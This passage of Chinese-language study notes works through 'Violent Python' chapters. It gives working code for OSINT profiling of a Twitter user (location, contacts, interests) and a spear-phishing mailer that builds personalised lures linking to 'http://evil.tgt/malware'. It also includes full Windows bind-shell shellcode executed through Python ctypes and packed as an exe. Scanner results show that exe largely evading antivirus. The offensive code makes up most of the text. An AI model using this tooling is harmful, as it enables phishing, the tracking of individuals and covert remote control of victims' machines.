parser.add_option('-d', dest='dir', type='string', help='specify destination directory')
(options, args) = parser.parse_args()
url = options.tgtURL
dir = options.dir
if url == None or dir == None:
print parser.usage
exit(0)
else:
try:
mirrorImages(url, dir)
except Exception, e:
print '[-] Error Mirroring Images.'
print '[-] ' + str(e)
if __name__ == '__main__':
main()
运行结果:
调用urllib库的quote_plus()函数进行URL编码,可以对查询字符串中需要编码的内容做相应转换(如空格编码为+)。
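quote_plus()的效果可以直接验证(Python 3中位于urllib.parse,Python 2中直接在urllib下):

```python
from urllib.parse import quote_plus, unquote_plus

term = 'Boondock Saint'
encoded = quote_plus(term)
print(encoded)                 # Boondock+Saint,空格被编码为+
print(unquote_plus(encoded))   # 解码还原为原字符串
```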
书上的接口(http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=)已经过期了:
提示换新的接口Custom Search API,具体怎么使用可以网上搜一下,这里直接上API:
https://www.googleapis.com/customsearch/v1?key=你的key&cx=你的id&num=1&alt=json&q=
num表示返回结果的数量、这里因为只是测试就设置为1,alt指定返回的数据格式、这里为Json,q后面为查询的内容、其内容需要经过URL编码。
#!/usr/bin/python
#coding=utf-8
import urllib
from anonBrowser import *
def google(search_term):
ab = anonBrowser()
# URL编码
search_term = urllib.quote_plus(search_term)
response = ab.open('https://www.googleapis.com/customsearch/v1?key=你的key&cx=你的id&num=1&alt=json&q=' + search_term)
print response.read()
google('Boondock Saint')
运行结果:
可以看到返回的是Json格式的数据。
接着就对Json格式的数据进行处理:
添加json库的load()函数对Json数据进行加载即可:
#!/usr/bin/python
#coding=utf-8
import urllib
from anonBrowser import *
import json
def google(search_term):
ab = anonBrowser()
# URL编码
search_term = urllib.quote_plus(search_term)
response = ab.open('https://www.googleapis.com/customsearch/v1?key=你的key&cx=你的id&num=1&alt=json&q=' + search_term)
objects = json.load(response)
print objects
google('Boondock Saint')
运行结果:
因为API不同,返回的Json数据的结构也略为不同,需要重新解析:
编写Google_Result类,用于保存Json数据解析下来的标题、页面链接以及一小段的简介:
#!/usr/bin/python
#coding=utf-8
import urllib
from anonBrowser import *
import json
import optparse
class Google_Result:
def __init__(self,title,text,url):
self.title = title
self.text = text
self.url = url
def __repr__(self):
return self.title
def google(search_term):
ab = anonBrowser()
# URL编码
search_term = urllib.quote_plus(search_term)
response = ab.open('https://www.googleapis.com/customsearch/v1?key=你的key&cx=你的id&num=1&alt=json&q=' + search_term)
objects = json.load(response)
results = []
for result in objects['items']:
url = result['link']
title = result['title']
text = result['snippet']
print url
print title
print text
new_gr = Google_Result(title, text, url)
results.append(new_gr)
return results
def main():
parser = optparse.OptionParser('[*]Usage: python anonGoogle.py -k <keyword>')
parser.add_option('-k', dest='keyword', type='string', help='specify google keyword')
(options, args) = parser.parse_args()
keyword = options.keyword
if options.keyword == None:
print parser.usage
exit(0)
else:
results = google(keyword)
print results
if __name__ == '__main__':
main()
运行结果:
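上述解析逻辑可以脱离网络先验证一遍。下面手工构造一段模仿Custom Search API返回结构的JSON(items/link/title/snippet等字段名以实际接口文档为准)来演示提取过程:

```python
import json

# 虚构的一段 Custom Search 风格响应
raw = '''{"items": [{"link": "http://example.com/",
                     "title": "Example Title",
                     "snippet": "A short description."}]}'''

objects = json.loads(raw)
for result in objects['items']:
    print(result['link'])
    print(result['title'])
    print(result['snippet'])
```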
和Google一样,Twitter也给开发者提供了API,相关文档在http://dev.twitter.com/docs。当然,这部分是需要FQ的,而且API地址也换了,对于返回Json格式的数据需要如Google Custom Search API一样进行另外分析,方法大同小异,可以自行测试一下,这里就只列出书上的代码,后面涉及Twitter的小节也一样。
#!/usr/bin/python
#coding=utf-8
import json
import urllib
from anonBrowser import *
class reconPerson:
def __init__(self, first_name, last_name, job='', social_media={}):
self.first_name = first_name
self.last_name = last_name
self.job = job
self.social_media = social_media
def __repr__(self):
return self.first_name + ' ' + self.last_name + ' has job ' + self.job
def get_social(self, media_name):
if self.social_media.has_key(media_name):
return self.social_media[media_name]
return None
def query_twitter(self, query):
query = urllib.quote_plus(query)
results = []
browser = anonBrowser()
response = browser.open('http://search.twitter.com/search.json?q=' + query)
json_objects = json.load(response)
for result in json_objects['results']:
new_result = {}
new_result['from_user'] = result['from_user_name']
new_result['geo'] = result['geo']
new_result['tweet'] = result['text']
results.append(new_result)
return results
ap = reconPerson('Boondock', 'Saint')
print ap.query_twitter('from:th3j35t3r since:2010-01-01 include:retweets')
#!/usr/bin/python
#coding=utf-8
import json
import urllib
import optparse
from anonBrowser import *

def get_tweets(handle):
    query = urllib.quote_plus('from:' + handle + ' since:2009-01-01 include:retweets')
    tweets = []
    browser = anonBrowser()
    browser.anonymize()
    response = browser.open('http://search.twitter.com/search.json?q=' + query)
    json_objects = json.load(response)
    for result in json_objects['results']:
        new_result = {}
        new_result['from_user'] = result['from_user_name']
        new_result['geo'] = result['geo']
        new_result['tweet'] = result['text']
        tweets.append(new_result)
    return tweets

def load_cities(cityFile):
    cities = []
    for line in open(cityFile).readlines():
        city = line.strip('\n').strip('\r').lower()
        cities.append(city)
    return cities

def twitter_locate(tweets, cities):
    locations = []
    locCnt = 0
    cityCnt = 0
    tweetsText = ""
    for tweet in tweets:
        if tweet['geo'] != None:
            locations.append(tweet['geo'])
            locCnt += 1
        tweetsText += tweet['tweet'].lower()
    for city in cities:
        if city in tweetsText:
            locations.append(city)
            cityCnt += 1
    print "[+] Found " + str(locCnt) + " locations via Twitter API and " + str(cityCnt) + " locations from text search."
    return locations

def main():
    parser = optparse.OptionParser('[*]Usage: python twitterGeo.py -u <handle> [-c <cityFile>]')
    parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
    parser.add_option('-c', dest='cityFile', type='string', help='specify file containing cities to search')
    (options, args) = parser.parse_args()
    handle = options.handle
    cityFile = options.cityFile
    if (handle == None):
        print parser.usage
        exit(0)
    cities = []
    if (cityFile != None):
        cities = load_cities(cityFile)
    tweets = get_tweets(handle)
    locations = twitter_locate(tweets, cities)
    print "[+] Locations: " + str(locations)

if __name__ == '__main__':
    main()
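The core of twitter_locate is just two passes over the tweets: collect geotags, then substring-match known city names against the concatenated text. That logic can be checked offline with made-up data (the tweets and city list below are invented for illustration):

```python
def locate_from_text(tweets, cities):
    """Collect geotags plus any known city name mentioned in tweet text."""
    locations = [t['geo'] for t in tweets if t['geo'] is not None]
    text = ' '.join(t['tweet'].lower() for t in tweets)
    locations += [c for c in cities if c in text]
    return locations

tweets = [
    {'geo': {'lat': 40.7, 'lon': -74.0}, 'tweet': 'Back in new york tonight'},
    {'geo': None, 'tweet': 'Missing boston already'},
]
print(locate_from_text(tweets, ['boston', 'new york', 'chicago']))
```

Note that naive substring matching will also fire on cities mentioned in passing, so the text-search hits are weaker evidence than the geotags.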
#!/usr/bin/python
#coding=utf-8
import json
import re
import urllib
import urllib2
import optparse
from anonBrowser import *

def get_tweets(handle):
    query = urllib.quote_plus('from:' + handle + ' since:2009-01-01 include:retweets')
    tweets = []
    browser = anonBrowser()
    browser.anonymize()
    response = browser.open('http://search.twitter.com/search.json?q=' + query)
    json_objects = json.load(response)
    for result in json_objects['results']:
        new_result = {}
        new_result['from_user'] = result['from_user_name']
        new_result['geo'] = result['geo']
        new_result['tweet'] = result['text']
        tweets.append(new_result)
    return tweets

def find_interests(tweets):
    interests = {}
    interests['links'] = []
    interests['users'] = []
    interests['hashtags'] = []
    for tweet in tweets:
        text = tweet['tweet']
        links = re.compile('(http.*?)\Z|(http.*?) ').findall(text)
        for link in links:
            if link[0]:
                link = link[0]
            elif link[1]:
                link = link[1]
            else:
                continue
            try:
                response = urllib2.urlopen(link)
                full_link = response.url
                interests['links'].append(full_link)
            except:
                pass
        interests['users'] += re.compile('(@\w+)').findall(text)
        interests['hashtags'] += re.compile('(#\w+)').findall(text)
    interests['users'].sort()
    interests['hashtags'].sort()
    interests['links'].sort()
    return interests

def main():
    parser = optparse.OptionParser('[*]Usage: python twitterInterests.py -u <handle>')
    parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
    (options, args) = parser.parse_args()
    handle = options.handle
    if handle == None:
        print parser.usage
        exit(0)
    tweets = get_tweets(handle)
    interests = find_interests(tweets)
    print '\n[+] Links.'
    for link in set(interests['links']):
        print ' [+] ' + str(link)
    print '\n[+] Users.'
    for user in set(interests['users']):
        print ' [+] ' + str(user)
    print '\n[+] HashTags.'
    for hashtag in set(interests['hashtags']):
        print ' [+] ' + str(hashtag)

if __name__ == '__main__':
    main()
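The interest extraction is driven by three regexes: @mentions, #hashtags, and http links (the script then follows each link with urllib2 to resolve shortened URLs). The pattern-matching part can be tested in isolation; the sample tweet below is invented for illustration:

```python
import re

def extract_interests(text):
    """Pull @mentions, #hashtags and http(s) links out of one tweet's text."""
    return {
        'users': re.findall(r'@\w+', text),
        'hashtags': re.findall(r'#\w+', text),
        'links': re.findall(r'https?://\S+', text),
    }

sample = 'Thanks @alice for the #python tips, see https://example.com/post'
print(extract_interests(sample))
```

The `https?://\S+` pattern is a simpler alternative to the book's two-branch `(http.*?)\Z|(http.*?) ` regex, which exists only to handle links at the end of the text versus mid-text.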
Now write a reconPerson class that wraps all of the code for scraping geolocation, interests, and the Twitter page:
#!/usr/bin/python
#coding=utf-8
import urllib
from anonBrowser import *
import json
import re
import urllib2

class reconPerson:
    def __init__(self, handle):
        self.handle = handle
        self.tweets = self.get_tweets()

    def get_tweets(self):
        query = urllib.quote_plus('from:' + self.handle + ' since:2009-01-01 include:retweets')
        tweets = []
        browser = anonBrowser()
        browser.anonymize()
        response = browser.open('http://search.twitter.com/search.json?q=' + query)
        json_objects = json.load(response)
        for result in json_objects['results']:
            new_result = {}
            new_result['from_user'] = result['from_user_name']
            new_result['geo'] = result['geo']
            new_result['tweet'] = result['text']
            tweets.append(new_result)
        return tweets

    def find_interests(self):
        interests = {}
        interests['links'] = []
        interests['users'] = []
        interests['hashtags'] = []
        for tweet in self.tweets:
            text = tweet['tweet']
            links = re.compile('(http.*?)\Z|(http.*?) ').findall(text)
            for link in links:
                if link[0]:
                    link = link[0]
                elif link[1]:
                    link = link[1]
                else:
                    continue
                try:
                    response = urllib2.urlopen(link)
                    full_link = response.url
                    interests['links'].append(full_link)
                except:
                    pass
            interests['users'] += re.compile('(@\w+)').findall(text)
            interests['hashtags'] += re.compile('(#\w+)').findall(text)
        interests['users'].sort()
        interests['hashtags'].sort()
        interests['links'].sort()
        return interests

    def twitter_locate(self, cityFile):
        cities = []
        if cityFile != None:
            for line in open(cityFile).readlines():
                city = line.strip('\n').strip('\r').lower()
                cities.append(city)
        locations = []
        locCnt = 0
        cityCnt = 0
        tweetsText = ''
        for tweet in self.tweets:
            if tweet['geo'] != None:
                locations.append(tweet['geo'])
                locCnt += 1
            tweetsText += tweet['tweet'].lower()
        for city in cities:
            if city in tweetsText:
                locations.append(city)
                cityCnt += 1
        return locations
A disposable email address improves anonymity; 10 Minute Mail works well for this:
https://10minutemail.com/10MinuteMail/index.html
Here we write an email client in Python and send mail to the target host, using the smtplib library with Google's Gmail SMTP server to log in and send messages.
Gmail's security is tight, however: before logging into a Gmail account from Python, make sure the account has the "allow less secure apps" option enabled.
#!/usr/bin/python
#coding=utf-8
import smtplib
from email.mime.text import MIMEText

def sendMail(user, pwd, to, subject, text):
    msg = MIMEText(text)
    msg['From'] = user
    msg['To'] = to
    msg['Subject'] = subject
    try:
        smtpServer = smtplib.SMTP('smtp.gmail.com', 587)
        print "[+] Connecting To Mail Server."
        smtpServer.ehlo()
        print "[+] Starting Encrypted Session."
        smtpServer.starttls()
        smtpServer.ehlo()
        print "[+] Logging Into Mail Server."
        smtpServer.login(user, pwd)
        print "[+] Sending Mail."
        smtpServer.sendmail(user, to, msg.as_string())
        smtpServer.close()
        print "[+] Mail Sent Successfully."
    except:
        print "[-] Sending Mail Failed."

user = 'username'
pwd = 'password'
sendMail(user, pwd, '[email protected]', 'Re: Important', 'Test Message')
Output:
Sent from the Gmail account to my own QQ mailbox; checking it there:
This section combines the earlier twitterClass.py to attack a target using the publicly accessible information they leave on Twitter. It finds the target's location, the users they @-mention, their hashtags and their links, then generates and sends an email containing a malicious link and waits for the target to click it. After adapting the Twitter class's parsing rules you can test it yourself.
#!/usr/bin/python
#coding=utf-8
import smtplib
import optparse
from email.mime.text import MIMEText
from twitterClass import *
from random import choice

def sendMail(user, pwd, to, subject, text):
    msg = MIMEText(text)
    msg['From'] = user
    msg['To'] = to
    msg['Subject'] = subject
    try:
        smtpServer = smtplib.SMTP('smtp.gmail.com', 587)
        print "[+] Connecting To Mail Server."
        smtpServer.ehlo()
        print "[+] Starting Encrypted Session."
        smtpServer.starttls()
        smtpServer.ehlo()
        print "[+] Logging Into Mail Server."
        smtpServer.login(user, pwd)
        print "[+] Sending Mail."
        smtpServer.sendmail(user, to, msg.as_string())
        smtpServer.close()
        print "[+] Mail Sent Successfully."
    except:
        print "[-] Sending Mail Failed."

def main():
    parser = optparse.OptionParser('[*]Usage: python sendSam.py -u <twitter handle> -t <target email> -l <gmail account> -p <gmail password>')
    parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
    parser.add_option('-t', dest='tgt', type='string', help='specify target email')
    parser.add_option('-l', dest='user', type='string', help='specify gmail login')
    parser.add_option('-p', dest='pwd', type='string', help='specify gmail password')
    (options, args) = parser.parse_args()
    handle = options.handle
    tgt = options.tgt
    user = options.user
    pwd = options.pwd
    if handle == None or tgt == None or user == None or pwd == None:
        print parser.usage
        exit(0)
    print "[+] Fetching tweets from: " + str(handle)
    spamTgt = reconPerson(handle)
    spamTgt.get_tweets()
    print "[+] Fetching interests from: " + str(handle)
    interests = spamTgt.find_interests()
    print "[+] Fetching location information from: " + str(handle)
    location = spamTgt.twitter_locate('mlb-cities.txt')
    spamMsg = "Dear " + tgt + ","
    if (location != None):
        randLoc = choice(location)
        spamMsg += " Its me from " + randLoc + "."
    if (interests['users'] != None):
        randUser = choice(interests['users'])
        spamMsg += " " + randUser + " said to say hello."
    if (interests['hashtags'] != None):
        randHash = choice(interests['hashtags'])
        spamMsg += " Did you see all the fuss about " + randHash + "?"
    if (interests['links'] != None):
        randLink = choice(interests['links'])
        spamMsg += " I really liked your link to: " + randLink + "."
    spamMsg += " Check out my link to http://evil.tgt/malware"
    print "[+] Sending Msg: " + spamMsg
    sendMail(user, pwd, tgt, 'Re: Important', spamMsg)

if __name__ == '__main__':
    main()
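The message-assembly logic can be exercised offline without any Twitter or SMTP access. A minimal sketch with single-element recon data (so `choice` is deterministic); the target address and recon values are invented for illustration:

```python
from random import choice

def build_spam(tgt, location, interests):
    """Assemble a personalised lure from whatever recon data is available."""
    msg = 'Dear ' + tgt + ','
    if location:
        msg += ' Its me from ' + choice(location) + '.'
    if interests.get('users'):
        msg += ' ' + choice(interests['users']) + ' said to say hello.'
    if interests.get('hashtags'):
        msg += ' Did you see all the fuss about ' + choice(interests['hashtags']) + '?'
    msg += ' Check out my link to http://evil.tgt/malware'
    return msg

msg = build_spam('victim@example.com', ['boston'],
                 {'users': ['@alice'], 'hashtags': ['#python']})
print(msg)
```

Note one weakness in the original script: `interests['users'] != None` is always true because find_interests returns empty lists, not None, so `choice` raises IndexError on an empty list; truthiness checks like `if interests.get('users'):` above avoid that.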
Use Metasploit to generate shellcode in C style as the payload. Here we use a Windows bindshell, which binds a chosen TCP port to the cmd.exe process so an attacker can connect remotely and take control.
Command:
msfvenom -p windows/shell_bind_tcp LPORT=1337 -f c -o payload.c
See "Metasploit study notes (II)" for an explanation of the parameters.
View the generated C file:
Then in Python, use the ctypes library: define a variable holding the shellcode, treat the variable as a C function, and execute it.
#!/usr/bin/python
#coding=utf-8
from ctypes import *
shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40"
"\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x05\x39\x89"
"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7"
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97"
"\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
"\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c"
"\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0"
"\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5"
"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb"
"\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5");
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
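Before running real shellcode, the ctypes mechanics (copy bytes into a C buffer, cast the buffer to a function pointer) can be checked with harmless bytes. This sketch only builds the pointer and never calls it; the byte string is placeholder data, not a working payload:

```python
from ctypes import create_string_buffer, cast, CFUNCTYPE, c_void_p, addressof

# Harmless bytes stand in for shellcode; nothing here is executed.
fake_shellcode = b'\x90\x90\xc3'   # two NOPs and a RET, treated as data only

buf = create_string_buffer(fake_shellcode, len(fake_shellcode))
func_ptr = cast(buf, CFUNCTYPE(c_void_p))   # same cast as above, NOT called
print(len(buf), hex(addressof(buf)))
```

Calling `func_ptr()` would attempt to jump into heap memory, which modern systems with DEP/NX mark non-executable, so the real technique also depends on the target allowing execution from writable memory.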
Then convert the py file into a Windows executable; for the steps, see "Local privilege escalation notes (II): process injection and exploiting vulnerabilities".
Run the exe and check the ports:
You can see it is indeed listening.
Then from Kali simply nc to port 1337 on the target host:
From inside China the book's vscan.novirusthanks.org is normally unreachable, but the verification script below is still worth studying:
#!/usr/bin/python
#coding=utf-8
import re
import httplib
import time
import os
import optparse
from urlparse import urlparse

def printResults(url):
    status = 200
    host = urlparse(url)[1]
    path = urlparse(url)[2]
    if 'analysis' not in path:
        while status != 302:
            conn = httplib.HTTPConnection(host)
            conn.request('GET', path)
            resp = conn.getresponse()
            status = resp.status
            print '[+] Scanning file...'
            conn.close()
            time.sleep(15)
    print '[+] Scan Complete.'
    path = path.replace('file', 'analysis')
    conn = httplib.HTTPConnection(host)
    conn.request('GET', path)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    reResults = re.findall(r'Detection rate:.*\)', data)
    # the HTML tags stripped here were lost from the original listing
    htmlStripRes = reResults[1].replace('', '').replace('', '')
    print '[+] ' + str(htmlStripRes)

def uploadFile(fileName):
    print "[+] Uploading file to NoVirusThanks..."
    fileContents = open(fileName, 'rb').read()
    header = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryF17rwCZdGuPNPT9U'}
    params = "------WebKitFormBoundaryF17rwCZdGuPNPT9U"
    params += "\r\nContent-Disposition: form-data; name=\"upfile\"; filename=\"" + str(fileName) + "\""
    params += "\r\nContent-Type: application/octet-stream\r\n\r\n"
    params += fileContents
    params += "\r\n------WebKitFormBoundaryF17rwCZdGuPNPT9U"
    params += "\r\nContent-Disposition: form-data; name=\"submitfile\"\r\n"
    params += "\r\nSubmit File\r\n"
    params += "------WebKitFormBoundaryF17rwCZdGuPNPT9U--\r\n"
    conn = httplib.HTTPConnection('vscan.novirusthanks.org')
    conn.request("POST", "/", params, header)
    response = conn.getresponse()
    location = response.getheader('location')
    conn.close()
    return location

def main():
    parser = optparse.OptionParser('[*]Usage: python virusCheck.py -f <filename>')
    parser.add_option('-f', dest='fileName', type='string', help='specify filename')
    (options, args) = parser.parse_args()
    fileName = options.fileName
    if fileName == None:
        print parser.usage
        exit(0)
    elif os.path.isfile(fileName) == False:
        print '[+] ' + fileName + ' does not exist.'
        exit(0)
    else:
        loc = uploadFile(fileName)
        printResults(loc)

if __name__ == '__main__':
    main()
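The heart of uploadFile is hand-rolling a multipart/form-data request body, which is easy to get wrong (CRLF separators, boundary markers, the trailing `--`). A self-contained sketch of the same construction; the field name, filename and boundary below are arbitrary examples:

```python
def build_multipart(field, filename, content, boundary):
    """Hand-roll a multipart/form-data body like the upload script above."""
    lines = [
        '--' + boundary,
        'Content-Disposition: form-data; name="%s"; filename="%s"' % (field, filename),
        'Content-Type: application/octet-stream',
        '',                        # blank line separates headers from content
        content,
        '--' + boundary + '--',    # closing boundary ends the body
        '',
    ]
    return '\r\n'.join(lines)

body = build_multipart('upfile', 'payload.exe', 'BINARYDATA', 'XBOUNDARYX')
print(body)
```

The matching Content-Type header must carry the same boundary string (`multipart/form-data; boundary=XBOUNDARYX`); in practice a library such as requests builds all of this for you.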
You can adapt this script to domestic online scanning platforms; in essence it is just a crawler that implements file upload.
Switching to the domestic Virscan online scanner to verify evasion: http://www.virscan.org/
2/39, a 5.1% detection rate.
Jotti's online malware scan: https://virusscan.jotti.org/
1/18, a 5.5% detection rate.
For comparison, the detection results for an exe generated directly with Metasploit:
msfvenom -p windows/shell_bind_tcp LPORT=1337 -f exe -o bindshell2.exe
15/39, a 38.4% detection rate.
The comparison shows that the backdoor built with this chapter's method evades detection quite well.
In short: with an msf-generated backdoor, the first approach generates an exe directly, but it is easily detected. The second generates a C file, executes the C payload through Python's ctypes library, and then converts the py file into an exe; these repeated file-type conversions effectively evade most antivirus software.
That is about it for this article. Briefly, some impressions: Python security covers a broad surface, and there are plenty of techniques worth learning here, including how some less common Python libraries are used in penetration work; most valuable of all are the security ideas themselves. Chapter 5 on wireless security was left unfinished due to environment and practicality constraints, and the book's problematic code elsewhere was modified to make it work (the Twitter sections are much like the Google API one, so they are not repeated); I may fill in the gaps later. Finally, the most important thing is to learn to extrapolate: modify or even completely rewrite the book's code and build penetration-testing tools of your own.